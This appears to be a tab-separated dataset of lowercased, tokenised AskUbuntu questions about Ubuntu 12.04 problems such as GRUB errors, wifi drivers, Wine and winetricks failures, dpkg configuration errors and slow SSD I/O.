169109	question regarding power outages affect on ubuntu	due to some reasons , sudden power outages are common at my place so my current operating system `` windows '' shut down improperly most of the time but this had no bad affects till now . so i would like to know if i use ubuntu , will abnormal shut down 's affect it 's system files or any other performance issue ? if so then please explain : ) your help will be very much appreciated .
169112	mouse moves slow , dose n't accelarate or move far .	it seems ubuntu does not support my mouse well . it dose n't matter how fast i move it , it just works how far i move it . this is really a critical issue when i try to click a link , or select something in a text , or click a little button etc . or when i want to move it across the screen , i move it really fast but it moves like a turtle . well , can anyone recommend me an application or setting that makes the cursor move faster or differently ?
169113	error ; unknown filesystem grub rescue >	i have a netbook with a dualboot for windows7 and ubuntu . i accidentally deleted the partition for ubuntu then after i restart my netbook it goes directly to the error : unknown filesystem grub rescue > . i have read some of the threads but most of them require a livecd . is there a way to fix this error without using a livecd ? i have an installer of ubuntu on a flash drive will that one work since i do n't have a dvd rom available ?
169119	ubuntu boot login prompt ?	recently restarted my computer after updates . i get pass grub and a login prompt with a black background came up to log in with a user name , password . after the login the prompt '' name @ name-ga990fxa-ud3 : ~ $ '' this came up . i 'm not sure where to go from here . i realize that ga990fxa-ud3 is my motherboard . i attempted older version which gave me error due no detection of devices . mouse and keyboard did n't work . recovery mode and repair .
169126	ubuntu one files ( android app ) not removing deleted files	i have ubuntu one files installed on my android phone . photos are set to auto-upload which works fine - i see the photos on my windows machines as expected . however , when i delete a photo from that folder using my windows machine ubuntu one files does not remove the corresponding file from the android phone . does the android app not support two-way sync ? or have i overlooked something ? thanks .
169137	why is one keyboard controlling both seats in my multiseat config ?	ubuntu 12.04 32-bit , stock install with minimal additional software i 'm trying to get a multiseat x setup going ... two separate keyboard/mouse/monitor sets on one pc . i used this document for guidance , and though i had to install kdm and a bunch of other kde stuff ( tried to accomplish this with lightdm but did n't get anywhere ) , i 'm so close to getting this working . the monitors and the mice are working correctly , which is to say i get two separate x login screens , and each mouse works a different screen . i also have one keyboard properly working one screen , but where it falls down is that the other keyboard ( kbd_0 ) works both screens . i ca n't tell where in my config it 's going wrong . any help would be appreciated . /etc/x11/xorg.conf /etc/kde4/kdm/kdmrc lspci /proc/bus/input/devices
169142	alt key hud web search in firefox	is it possible to conduct a web search ( in firefox 14 ) from the hud ? ( ubuntu 12.04 ) for example , hitting the alt key ( to bring up the hud menu for firefox ) and typing in a search term ? it does n't seem to be a feature currently , and i was wondering , is there a way to do something like this ?
169146	how do i set up a lan game ?	i 'd like to play freeciv on my local area network over a wireless router . i can get the freeciv server up and running , and the client will connect to the server if i run it off of the same computer . however , it does n't work for another computer connected to the same router . other computers on the network can see the server , but clicking the connect button results in the message failed looking up host . i 've allowed port 5556 in ufw , but have n't tried any other network configuration since i do n't know much about networking . if anyone can help get things up and running , i 'd appreciate it .
169149	why does updating precise lead to bugs during boot ?	i 've experienced this problem every time ( 3 times now ) i install precise and run a dist-upgrade : when booting up , i get thrown a gfxmode error , followed by either a long blank screen with a single blinking cursor ( with splash on ) , before showing the plymouth splash for all of a split second . i use the workaround for the gfxmode error , but i still end up with a weird-looking boot up because of the splash not showing until the very end . my main concern though is why this sort of thing occurs in the first place , and what might be happening during the update process to be causing this . ( and i 'm pretty sure it 's something that was caused by updating ; the boot process was fine until i did an upgrade ) .
169150	how does ubuntu live/install disc jack boot/bios ?	when you put the ubuntu 12.04 live cd/install cd in and start the computer , instead of saying `` press any key to boot from disk ... ... ... . '' and going to hard drive boot upon no key press , which is what happens with other disks , it automatically starts the disc . how does this happen ? what 's going on ?
169151	no command 'apt ' found , did you mean:	when i try to run : apt âget install vsftpd i get the error : no command 'apt ' found , did you mean : command 'aptd ' from package 'aptdaemon ' ( main ) command 'xapt ' from package 'xapt ' ( universe ) command 'opt ' from package 'llvm ' ( universe ) command 'apm ' from package 'apmd ' ( main ) command 'atp ' from package 'atp ' ( universe ) command 'ppt ' from package 'bsdgames ' ( universe ) command 'apf ' from package 'apf-firewall ' ( universe ) command 'apg ' from package 'apg ' ( main ) command 'gpt ' from package 'gpt ' ( universe ) command 'ant ' from package 'ant ' ( main ) command 'ant ' from package 'ant1.7 ' ( universe ) command 'at ' from package 'at ' ( main ) command 'pat ' from package 'dist ' ( universe ) command 'aft ' from package 'aft ' ( universe ) apt : command not found what gives ? -.-
169154	ca n't install ubuntu on my desktop	i have tried to install ubuntu via usb , and when i clicked install ubuntu on a hard disk . it starts like to load something and it freezes on a screen that says `` detected 1024 mib vram '' .please help my pc specs : intel i3-2100 @ 3.1 ghz 8gb ddr3 ram memory nvidia geforce gts 450 evga 60gb ssd hard disk msi h61m-p23 ( g3 ) - motherboard
169155	network issues with realtek rtl8111e	i run ubuntu 12.04 dual boot with windows 7 on my dell inspiron n4110.my internet speed is very slow on my ubuntu.my ethernet speed is 100 mb/s.but , i am getting only 10 mb/s.this is really annoying me.my laptop has realtek rtl8111e gigabit ethernet controller on board ( found on dell website ) .i have googled it and found there are known issues with realtek rtl8111 ethernet card.i decided to download the driver from realtek . the output of lspci -v command ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) subsystem : dell device 04d7 flags : bus master , fast devsel , latency 0 , irq 46 i/o ports at 2000 [ size=256 ] memory at d0404000 ( 64-bit , prefetchable ) [ size=4k ] memory at d0400000 ( 64-bit , prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : r8169 kernel modules : r8169 this output shows the network card is rtl8101e/rtl8102e pci express fast ethernet controller and in windows , it is realtek rtl8111e gigabit ethernet controller.are these both same.which one should i download . i never had an issue with 11.10 ... . help
169159	not able to install marble and kpatience	i am trying to install two software : marble - a software for studying maps and globe and kpatience - a card game . both seem to start the installation nicely but as the download progresses suddenly it stops asking me to check my internet connection , which is fine . both these software are part of some kde package as i understood from their description . i do n't know much about that and i am a new user to linux . someone please help me with this problem . i am using ubuntu 12.04
169165	can i safely remove a tar archive after extracting it ?	or am i supposed to save them for some reason ?
169169	can anyone help with this font problem ?	( the above screenshot is of a drop-down menu , by the way . ) so , i 've been having problems for the last while where some text ( not all ) is scrunched up like in the screenshot above . i 've tried fiddling around with the font settings , resetting font settings to default , etc. , but i have n't found anything that 's worked . this happens in both chromium and firefox and it 's really getting annoying . it makes things very hard to select , not to mention it just looks hideous . has anyone else experienced this problem ? any ideas on how to fix it ? it happens whether i 'm using unity , gnome shell or kde plasma .
169172	i lost the boot partition , what should i do ?	recently , i dualbooted windows 7 and ubuntu 12.04 , then i decided to be able to open the windows 7 files from within ubuntu . but i mounted the wrong partition and accidentally deleted it when i realized it was the wrong one ... it 's only when i restarted my computer that i realized that i deleted the boot partition . now , whenever i try to open the pc , it says : bootmgr is missing press ctrl+alt+del to restart whenever i try the above command , it eventually restarts and gets back to the same screen . windows 7 was the main boot screen . i was planning on creating a windows recovery disc , is it a great idea ? will it work ? if not , have any other ideas ?
169176	how to fix slow wireless with intel 4965 agn ?	we run ubuntu 12.04 , 32bit , with the current kernel 3.2.27-generic on an msi ex700 . i 've already added the 11n_disable=1 tweek , without whcih , wireless has been unusable . now , it works ok , but speedtest shows : windows xp - down 11.68mbps , up 2.07mbps ubuntu 12.04 - down 2.06mbps up 2.0mbps we 've disabled ipv6 , tried static and dinamic ips , tried both swcrypto=0 and swcrypto=1 options , none of whcih made any difference . the problem may be the symptom of high packet loss . for example , here 's the output of iwconfig after booting and testing the speeds : wlan0 ieee 802.11abg essid : '' amu '' mode : managed frequency:2.462 ghz access point : 00:78:9e : fa:32 : c8 bit rate=54 mb/s tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : off link quality=58/70 signal level=-52 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:11 invalid misc:3627 missed beacon:0 i 've posted a help request before with lots of technical info and outputs .
169190	no internet connection using ethernet	i installed ubuntu 12.04 as an app in windows 7 . i got internet but after updating it and restarting it , there is no internet . it shows that it is connected to wired connection 1 but no internet .
169193	need a playlist creator for linux that will do relative paths	under windows i use `` playlist creator 3.6.2 '' this just about the ideal program for what i want , but under wine , you can not access it 's setup to set the feature i want the most , and that is relative paths in the playlist . without this , playlists are not as portable across devices . i am looking for a small standalone app that i can just drag'n'drop files onto to create playlists , but i also tried , but can not see how , to get rhythmbox or amarok to do this . edit : what i want to do is to be able to sit at my computer and create ( fairly long ) playlists that the small linux based music player attached to my hifi system can play . both the player , and my desktop can see the same network drive that holds the music , but see it mounted/shared differently - hence the playlists , placed in the root of the network storage , should use relative paths , then will work , no matter how it is mounted or accessed .
169197	updating cinnamon causes grub to freeze before the login screen	i have 3 hdds and on /dev/sda1 , i have ubuntu 12.04 installed and also the bootloader is on the same disk . after grub when i select ubuntu 12.04 to boot up it freezes just after the grub screen and before the login screen . here is an image attached this is how this problem started . i have ubuntu 12.04 and i installed cinnamon , it was working fine , until i updated the cinnamon . cinnamon 's new update had some problems and it used to freeze a lot while i was working on my computer . so i read some solutions online , and they dictated me to downgrade the xserver-common package . i did that , and after downgrading the xserver-common , i restarted , and this is what turns up . it just wo n't proceed forward from this screen . i need to restore it to fully functioning condition , since i have made a lot of changes on my ubuntu 12.04 which take about 9 - 10 hours of work and i do not want to redo them . so , re-installation is not an option . is there anyway i can get my os working again . also would the recovery mode help.i edited my grub default files in /etc/defaults/grub for not to display the recovery mode . so , if you can tell me how to boot up the recovery mode using grub cli , that would be great . also note , i can not access tty1 on that screen and there was n't any response , does n't matter which button i press . after pressing shift , i tried the grub menu , it still looks like this edit that worked perfectly . i upgraded , the xserver-common . and then booted up ubuntu , it booted up to the login screen . but then it freezes . on the login screen . i cannon move the cursor nor the keyboard works . i can see the ubuntu login screen , but i can not do any thing . i tried going back to recovery but it bring me back to the same screen . i also tried failsafe graphics mode and still it brings me back to the login screen where it gets stuck .
169198	can not update ubuntu	i am new to ubuntu and new to this site . whenever i try to update through the update manager it fails and says `` package operation failed.the installation or removal of a software package failed . '' it 's getting really annoying . also whenever i try to sudo apt-get upgrade , this happens at the end : '' fetched 240 mb in 5min 39s ( 708 kb/s ) extracting templates from packages : 100 % preconfiguring packages ... dpkg : error : configuration error : /etc/dpkg/dpkg.cfg.d/multiarch:1 : unknown option 'sudo' cups failed to preconfigure , with exit status 2 dpkg : error : configuration error : /etc/dpkg/dpkg.cfg.d/multiarch:1 : unknown option 'sudo' dpkg : error : configuration error : /etc/dpkg/dpkg.cfg.d/multiarch:1 : unknown option 'sudo' e : sub-process /usr/bin/dpkg returned an error code ( 2 ) '' last , but not least , whenever i try to install adobe flash by selecting `` install missing plugins '' it says it fails . please help .
169199	black screen after resuming from sleep on ibm x30	a currently installed ubuntu 12.04 will leave my ibm x30 with a black screen after resuming from sleep mode . it seems as if the machine itself would return , but only the screen remains black and without backlight . the problem does not occur on an identically installed x40 .
169205	how to use ubuntu server virtualization feature ?	i have downloaded and installed ubuntu 11.10 server on a high end dell power edge server . i have another desktop for my development which is windows 7 how do i create vm 's etc on ubuntu 11.10 server ? i would like to do it from my development desktop i mean all the vm management etc from windows 7 can someone suggest which would be better option ? i am new to virtualisation , i want some simple gui based tools to do , am not a cli geek . regards sashank
169206	wireless hard block on asus n61jv ( ar9285 )	hi i just did fresh install of ubuntu and i noticed that my wifi is disabled . in try menu it says that my hardware switch is disabled but there is no physical switch on n61jv . i tried fn+f2 witch should working as `` hardware switch '' but it did n't help . then i tried to do rfkill list all : 0 : phy0 : wireless lan soft blocked : no hard blocked : yes the rfkill ublock all command dose n't change anything there . i know that pressing fn+f2 changes `` soft blocked : '' to `` yes '' . i do n't have any idea what to do now . edit : gksu jockey-gtk did n't show any drivers , here are my outputs : lscpi : 00:00.0 host bridge : intel corporation core processor dram controller ( rev 18 ) 00:01.0 pci bridge : intel corporation core processor pci express x16 root port ( rev 18 ) 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 18 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 06 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 06 ) 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 06 ) 00:1c.2 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 3 ( rev 06 ) 00:1c.3 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 4 ( rev 06 ) 00:1c.4 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 5 ( rev 06 ) 00:1c.5 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 6 ( rev 06 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a6 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 06 ) 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 4 port sata ahci controller ( rev 06 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 06 ) 00:1f.6 signal processing controller : intel corporation 5 series/3400 series chipset thermal subsystem ( rev 06 ) 01:00.0 vga compatible controller : nvidia corporation gt216 [ geforce gt 325m ] ( rev a2 ) 03:00.0 network controller : atheros communications inc. ar9285 wireless network adapter ( pci-express ) ( rev 01 ) 08:00.0 ethernet controller : atheros communications inc. ar8131 gigabit ethernet ( rev c0 ) 3f:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 05 ) 3f:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 05 ) 3f:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 05 ) 3f:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 05 ) 3f:02.2 host bridge : intel corporation core processor reserved ( rev 05 ) 3f:02.3 host bridge : intel corporation core processor reserved ( rev 05 ) sudo lshw -class network : *-network disabled description : wireless interface product : ar9285 wireless network adapter ( pci-express ) vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 01 serial : 48:5d:60:37:08:62 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.2.0-27-generic firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory : e8800000-e880ffff *-network description : ethernet interface product : ar8131 gigabit ethernet vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:08:00.0 logical name : eth0 version : c0 serial : 1e : cb:7d:5c : b5 : e4 size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vpd bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl1c driverversion=1.0.1.0-napi duplex=full firmware=n/a ip=192.168.0.103 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:51 memory : e3800000-e383ffff ioport:7000 ( size=128 )
169214	how to configure iscsi fault tolerance in ubuntu 12.04 ?	how to configure iscsi fault tolerance in ubuntu 12.04 ? iscsi sans usually have multiple controllers that make failover transparent to the clients.. what i am doing is the following . i made an ubuntu pc as target which means a pc to work as storage where i map its hdd as lun also there is another pc which works as initiator so there is no ready solutions such as san im doing from scratch so i need to learn how to configure that .
169215	weather indicator app stopped working	i 've been using the weather indicator for a while now on 12.04 and for the past day or so it has n't been able to update . it just shows the same weather icon ( the sun ) and the same temperature all day . right now it 's 2am and it thinks it 's sunny outside at 72 degrees when it 's actually about 62 degrees outside right now . from the drop down menu it just keeps saying 'refreshing , please wait' i 've tried uninstalling and reinstalling it through the software center , logging off/restarting and nothing seems to work . any thoughts for this issue ? thanks in advance .
169217	terminal not prompting properly on tab press	the installed packages prompt is working fine , eg , gedtab completes to gedit , but package autocomplete on apt-get is not showing list of matching packages , like , sudo apt-get install gedtab wo n't try to fit ged* packages as it normally should . similarly , quicklytab pops files and folders in the current directory instead of prompting `` commands , create , etc '' . any way of correcting this ? and yes , i 'm on ubuntu 12.04 .
169218	winetricks ca n't install mfc42	i 'm trying to have a windows program ( janome customizer ) run with wine . i have an `` out of the box '' ubuntu 64bits 12.04 install , and just ran software center to update all packages . installation of customizer went ok , then i run the program , a window appear , but nothing happens when i click a button . so i run the program with what i found in the shortcut installed by wine : john @ mylaptop : ~ $ env wineprefix= '' /home/john/.wine '' wine `` c : \\windows\\command\\start.exe '' /unix `` /home/john/.wine/dosdevices/c : /users/public/desktop/janome customizer.lnk '' i get two warnings : fixme : exec : shell_execute flags ignored : 0x00000100 fixme : exec : shell_execute flags ignored : 0x00004100 the customizer window appear , and when i click a button this error is printed : err : module : import_dll library mfc42.dll ( which is needed by l '' c : \\\\program files ( x86 ) \\\\janome\\\\customizer 10000 plus\\\\mc9500\\\\mkstitch.dll '' ) not found err : module : import_dll library mkstitch.dll ( which is needed by l '' c : \\\\program files ( x86 ) \\\\janome\\\\customizer 10000 plus\\\\mc9500\\\\easyimport95.exe '' ) not found err : module : ldrinitializethunk main exe initialization for l '' c : \\\\program files ( x86 ) \\\\janome\\\\customizer 10000 plus\\\\mc9500\\\\easyimport95.exe '' failed , status c0000135 so i googled for this error and tried to install mfc42 with winetricks , but i get the error : john @ mylaptop : ~ $ winetricks mfc42 executing w_do_call mfc42 executing load_mfc42 executing mkdir -p /home/john/.cache/winetricks/vcrun6 downloading http : //download.microsoft.com/download/vc60pro/update/1/w9xnt4/en-us/vc6redistsetup_enu.exe to /home/john/.cache/winetricks/vcrun6 -- 2012-07-28 08:58:50 -- http : //download.microsoft.com/download/vc60pro/update/1/w9xnt4/en-us/vc6redistsetup_enu.exe resolving download.microsoft.com ( download.microsoft.com ) ... 158.255.97.16 , 158.255.97.65 connecting to download.microsoft.com ( download.microsoft.com ) |158.255.97.16|:80 ... connected . http request sent , awaiting response ... 404 not found 2012-07-28 08:58:51 error 404 : not found . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- downloading http : //download.microsoft.com/download/vc60pro/update/1/w9xnt4/en-us/vc6redistsetup_enu.exe failed -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- i tried to manually install mfc42 with other google results , to no avail . i would prefer to use winetricks . if i ca n't do it with winetricks , manual install belongs to another question . just to be sure , i tried booting on a live cd ( usb key , actually ) , with ubuntu 12.04 32bits . installed wine through software center , but then running winetricks mfc42 yields the same error . interestingly , on another computer which i use daily , plugged into the same internet router , installing mfc42 works : 11:35:45 ~ > winetricks mfc42 p11-kit : could n't load module : /usr/lib/i386-linux-gnu/pkcs11/gnome-keyring-pkcs11.so : /usr/lib/i386-linux-gnu/pkcs11/gnome-keyring-pkcs11.so : can not open shared object file : no such file or directory executing /usr/bin/cabextract -q /home/jrouquie/.cache/winetricks/vcredist.exe -d /home/jrouquie/.wine/dosdevices/c : /windows/system32 -f mfc42u.dll using native , builtin override for following dlls : msvcrt executing early_wine regedit c : \winetrickstmp\override-dll.reg install of mfc42 done winetricks done . 11:36:29 ~ > winetricks mfc42 prerequisite vcrun6 already installed , skipping install of mfc42 done winetricks done . 11:46:00 ~ > thanks for any help installing mfc42 .
169220	analog stereo out on speakers and headphones	this sounds like a pretty dumb question but how can i get audio output on headphones and speakers ? my motherboard is ga-g41m-combo and does n't seem to have any digital audio out , but 3 miniplugs coloured blue , green , and red . i do n't want surround , i just want headphones and speakers working at the same time without needing to switch a cable ( my headphones have a power on/off toggle ) . the motherboard looks like this : i currently have speakers plugged into green ( working ) and headphones plugged into blue ( no sound ) , and ca n't seem to get output on the headphones after fiddling with the sound settings in ubuntu 12.04 . do i really have to buy a splitter ? ! the motherboard did n't come with any front panel adapters .
169221	how to make thunar show short file names ?	by default , thunar always shows full names for files , while nautilus adds `` ... '' to the end of the file , so they all look the same . can i somehow make thunar behave like nautilus ?
169222	using 2 factor authentication syncing gmail contacts with evolution	i have been trying to get an answer to a question but all i find are links to non related subjects or suggestions to try another method . so here goes : is is possible to get gmail contacts synchronised with evolution in ubuntu 12.04 ? i have been able to get the email and calendar components set up very easily in a matter of seconds , the contact aspect though is proving more difficult . the method i 'm currently using is to : go to the contacts tab select new and then `` addressbook '' from the dropdown list select `` google '' from the options add in all the requested information and hit apply it then throws a large red error banner : '' this address book can not be opened . this either means that an incorrect uri was entered , or the server is unreachable . detailed error message : this account requires an application-specific password . ( http : //www.google.com/support/accounts/bin/static.py ? page=guide.cs & guide=1056283 & topic=1056286 ) '' it never asks me for a password or provides a location for me to enter in the password required . has any one been able to get this working ? if so what steps am i missing or performing incorrectly ? thanks for any suggestions
169223	tar : a lone zero block at 343398	while trying to extract a tar.gz file in ubuntu terminal an error happened int he last sentence here it is : tar : a lone zero block at 343398 what is the solution for this problem ? ? ?
169224	having to boot from cd and use previous linux kernel	i have overwritten windows xp with ubuntu 12.04 on my asus computer with an asrock motherboard . i use an asus en8400gs silent graphics card using nvidia drivers , and have 2 sticks of 512mb ddr2 ram . it was working fine , until i went to linuxpoison.com and followed their steps to disable ipv6 . it did n't work . could n't edit the file i needed to edit . but nothing happened , except when i watched youtube videos , my computer played it all the way through in super fast forward , then i had to restart the video and it would play normally . next time i booted , it booted fine , but it software manager installed a new linux kernel . i rebooted , and it worked fine again , except for the youtube problem . next time i booted however , i got an error message from the kernel , saying `` err0r , hd0 out of disk '' . i then booted from my install disk , and ran a previous linux kernel version . doing this has worked fine , until today , when i 'd left my computer on last time i was here , even though i 'd told it to shut down , my grandad tried shutting it down , but he could n't and therefore put it in hibernate , which today meant i could n't boot from disk or hdd . but i finally got it working . could anyone tell me how to fix this ! ? ! ? edit : this is sorted now , but i am not deleting this question because i would still like to know the answer , in case it happens again .
169225	will removing windows also remove wubi ?	i installed ubuntu via ubuntu windows installer 12.04 , but now i want to remove windows on my computer . will ubuntu be removed , if i remove windows ? i also want to change storage size , because ubuntu is really running slower than windows 7 .
169226	manage 2 wireless device	i erased windows 7 and installed ubuntu 12.04 on my dell latitude e4200 . i an very happy with my choice but with little pity . i can not use the wireless service in my university as the build-in device works unstable . i bought a usb wireless device , which solve the problem . however , the build-in device keep to sent me message about unable to connect , which waste laptop 's cup & battery . the phsical bottom to turn off wireless affect both devices . so the question is : `` how can i manually shut down wireless device ? '' there is another interest comes to my mind : `` does 2 wireless improve the overall internet usage if i run a high-internet-consuming program like bt ? '' thank for your time and energy .
169228	ca n't get wireless on macbook pro 8,2	i 'm a linux newb , and i have tried several of the fixes listed to try and get my wifi drivers to work , but to no avail . does anyone here know why this is n't working for me , or better yet , how to fix it ? under lspci -vvv i get the following output : 03:00.0 network controller : broadcom corporation bcm4331 802.11a/b/g/n ( rev 02 ) subsystem : apple inc. airport extreme control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- serr- kernel modules : bcma with sudo lshw -class network i get this output : *-network unclaimed description : network controller product : bcm4331 802.11a/b/g/n vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 version : 02 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : b0600000-b0603fff any help would be greatly appreciated !
169229	disable integrated gpu ( intel hd graphics 3000 ) on sony vaio vpcse	i have a sony vaio vpcse2l9e and want do disable the integrated gpu . i want to install the fglrx packages to use the full gpu power of my amd radeon hd 6630m . here is the link for the technical data of the notebook : sony homepage for vpcse how can i do this ? is there a way to blacklist the integrated gpu on startup or is there an other solution for my problem ?
169240	ubuntu 12.04 wifi wpa 2 connected to router but can only be accessed by ssh	the problem is that my ubuntu server 12.04 can only be accessed by ssh . it connects to the router with a wifi wpa 2 encryption . im not using a firewall , and it should be sharing to both windows and mac using samba and afp . this works when the connection is wired , but not through the wireless ? can anyone directe me or give me any ideas as what to try . thank you in advance . here is a little more detail iwconfig ( i think the problem is here - i do not have an ip address ? ) lo no wireless extensions . wlan0 ieee 802.11bgn essid : '' tomato '' mode : managed frequency:2.452 ghz access point : 20:4e:7f:10:18:54 bit rate=121.5 mb/s tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=56/70 signal level=-54 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:1 invalid misc:94 missed beacon:0 eth0 no wireless extensions . dmesg | grep eth0 [ 3.207518 ] r8169 0000:04:00.0 : eth0 : rtl8168e/8111e at 0xf8414000 , 14 : da : e9:6b : b1:74 , xid 0c200000 irq 46 [ 3.207525 ] r8169 0000:04:00.0 : eth0 : jumbo features [ frames : 9200 bytes , tx checksumming : ko ] [ 8.312266 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 12.870001 ] r8169 0000:04:00.0 : eth0 : link down [ 12.870368 ] addrconf ( netdev_up ) : eth0 : link is not ready dmesg | grep wlan0 [ 45.689429 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 45.693155 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 48.743038 ] wlan0 : authenticate with 20:4e:7f:10:18:54 ( try 1 ) [ 48.745261 ] wlan0 : authenticated [ 48.776724 ] wlan0 : associate with 20:4e:7f:10:18:54 ( try 1 ) [ 48.780280 ] wlan0 : rx assocresp from 20:4e:7f:10:18:54 ( capab=0x411 status=0 aid=2 ) [ 48.780290 ] wlan0 : associated [ 48.787054 ] addrconf ( netdev_change ) : wlan0 : link becomes ready
169241	how do i disable online videos in the unity dash ?	when i open the unity launcher and click on the last icon for videos , i get three lists : recently seen , my videos , online videos online videos is listing videos , that i consider highly inappropriate ( for example a video trying to convince people with a live threatening disease to have faith instead of visiting a doctor ) . how is that list generated ? how do i deactivate it ? why does it show those videos instead of videos i relate to ? ( i am the only user of this computer ) edit : i am not referring to porn , but religion . i am fine that such context exists and is findable when searched . but i do n't want that to popup on my computer by itself .
169246	how do i completely remove web apps ?	i could not get the new web apps preview to work properly on my 12.04 system , so i decided to remove it using the following code : sudo apt-get install ppa-purge sudo ppa-purge ppa : webapps/preview sudo apt-get remove gnome-control-center-signon signond signon-keyring-extension signon-plugin-oauth2 signon-ui libunity-webapps-chromium unity-chromium-extension unity-lens-gdocs unity-lens-photo unity-scope-flickr xul-ext-webaccounts xul-ext-unity xul-ext-websites-integration however , this does not remove already created web apps , which are still accessible via the unity dash . in my case the google reader and reddit web apps are still available in the dash . any help completely removing these web apps would be greatly appreciated .
169247	can not connet to password protected wifis	network manager can not connect to a wifi , if the wifi is password protected ( wep or wpa ) . however it can connect to passwordless wifis . also , i can conned to password protected wifis manually as : sudo service network-manager stop sudo iwconfig eth1 essid `` < wifi-name > '' key s : < wifi-passphrase > sudo dhclient eth1 but it would be nice to get the network manager working again . any suggestions where to look for the cause of this problem ? the network manager does see the wifi , but then it just keeps forever trying to connect , never succesfully . i also tried installing an alternative manager , wicd , and it has the same problem , looks like it gets stuck to trying to get ip , never succeeds . after update to 12.04 and trying several desktop environments ( finally settling to xfce ) , i removed kde , gnome3 and ubuntu desktop following these advice : http : //www.psychocats.net/ubuntu/pureubuntu remove gnome shell completely after installing it ? http : //ubuntublog.org/how-to-remove-unity-desktop-in-ubuntu-12-04.htm maybe those removed some ( maybe dhcp-related ) component , that is causing my problem , but this is just a guess . edit : as i said , i also tried with wicd , and it gets stuck in exactly same way .
169252	no boot manager after new ubuntu installation	i just installed ubuntu 12.04 on my c drive using the windows installer lts . windows 7 also resides on my c drive . the installation appears to have completed but i never did get the boot manager ( grub ) window at start-up . so my computer only boots to windows 7 . also i no longer see my f8 or f12 boot options - not good ! thanks for any help in this !
169259	wubi gives error 'nonetype ' object has no attribute 'get_info '	while installing through wubi , an error occurs 'nonetype ' object has no attribute 'get_info ' for more information see the log file . ...
169261	i want to hide the unity 2d launcher completely	i want to hide the launcher completely . i want it to pops up only when i press the super key . my problem is , i use cairo-dock and use auto-hide feature of launcher , but the launcher pops up , whenever i launch an application from my dock , and it 's annoying . i use cairo-dock and unity 2d .
169270	i ca n't reinstall packages	debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable setting up debconf ( 1.5.42ubuntu1 ) ... locale : /lib/i386-linux-gnu/libc.so.6 : version `glibc_2.15 ' not found ( required by locale ) debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable dpkg : error processing debconf ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : debconf
169271	ssd i/o extremely slow installing/booting ubuntu 12.04	these are some useful specs : macbook pro 7,1 owc mercury extreme pro 2,5 '' sata ssd ( 120 gb ) . has sandforce driver . ubuntu 12.04 desktop 32 bits . one 18 gb partition for gnu/linux and 1.5 gb for swap . md5 for the ubuntu install cd is ok . i tried to install ubuntu . it seems that everything is recognized , but there 's a big problem : read and writes to the ssd are extremely slow . for example , the install process , which should n't take more than 20 minutes , it takes 7 hours . then , booting up the computer takes about 20 minutes . i checked and the problem is definitely the ssd . every access to any file is like 10 times slower than normal . i have tried to format the partition as ext4 and ext3 with the same problem . trying to install other distros like fedora 17 , i have a similar problem . there 's a `` lag '' with the ssd , but not so accused as in ubuntu . surprisingly , debian 6.0 installs and works without any problem . mac os works pretty good as well in the other partition , so i discard it 's an ssd problem . thanks for your help !
